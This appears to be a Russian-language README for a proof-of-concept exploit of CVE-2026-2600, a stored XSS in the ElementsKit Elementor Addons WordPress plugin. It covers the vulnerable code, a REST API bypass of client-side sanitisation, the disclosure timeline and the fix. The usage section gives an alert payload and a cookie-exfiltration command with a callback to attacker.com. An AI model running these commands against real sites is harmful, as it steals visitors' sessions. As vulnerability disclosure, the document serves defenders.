
Доказательство концепции эксплуатации для CVE-2026-2600, хранимой XSS в ElementsKit Elementor Addons <= 3.7.9, позволяющей аутентифицированным авторам (Contributors) внедрять произвольные скрипты через специально сформированные данные Elementor.
| CVSS | 6.4 MEDIUM |
| Затронуто | <= 3.7.9 |
| Исправлено | 3.8.0 |
| Мин. роль | Contributor (edit_posts) |
| Вектор | Сеть / Низкая сложность / Низкие привилегии |
Виджет Simple Tab выводит заголовки вкладок с помощью echo без экранирования вывода. В widgets/tab/tab.php цикл рендеринга выглядит так:
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}
Редактор Elementor санирует ввод на стороне клиента, но конечная точка REST API (/wp-json/wp/v2/posts/{id}) принимает мета-поле _elementor_data напрямую и полностью обходит этот уровень защиты.
Аутентифицированный Contributor может отправить PATCH-запрос к записи с подделанным JSON-пейлоадом Elementor, который задаёт ekit_tab_title как произвольный HTML. Поскольку значение сохраняется дословно в _elementor_data и выводится без esc_html() во время рендеринга, скрипт выполняется в браузере каждого посетителя при загрузке страницы.
Любой Contributor может:
На момент раскрытия уязвимости было затронуто более 400 000 активных установок.
pip install requests
python3 poc.py https://target.com contributor p4ss
Скрипт аутентифицируется по HTTP, получает REST nonce из админ-редактора, создаёт черновик записи, патчит _elementor_data с XSS-пейлоадом, встроенным в поле ekit_tab_title, и публикует запись. Вывод подтверждает, активен ли пейлоад в исходном коде страницы.
# Пользовательский пейлоад
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'
# Эксфильтрация cookie с колбэком
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# Интерактивный консольный режим
python3 console_poc.py
| Дата | Событие |
|---|---|
| Январь 2026 | Обнаружено при анализе диффов SVN. PoC подтверждён. |
| Январь 2026 | Сообщено в Patchstack Alliance с полным описанием и PoC. |
| Март 2026 | Wpmet выпустил исправление в v3.8.0. |
| Апрель 2026 | Опубликован CVE-2026-2600. Присвоен CVSS 6.4 MEDIUM. |
Wpmet добавил esc_html() вокруг вывода заголовка вкладки в widgets/tab/tab.php:
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';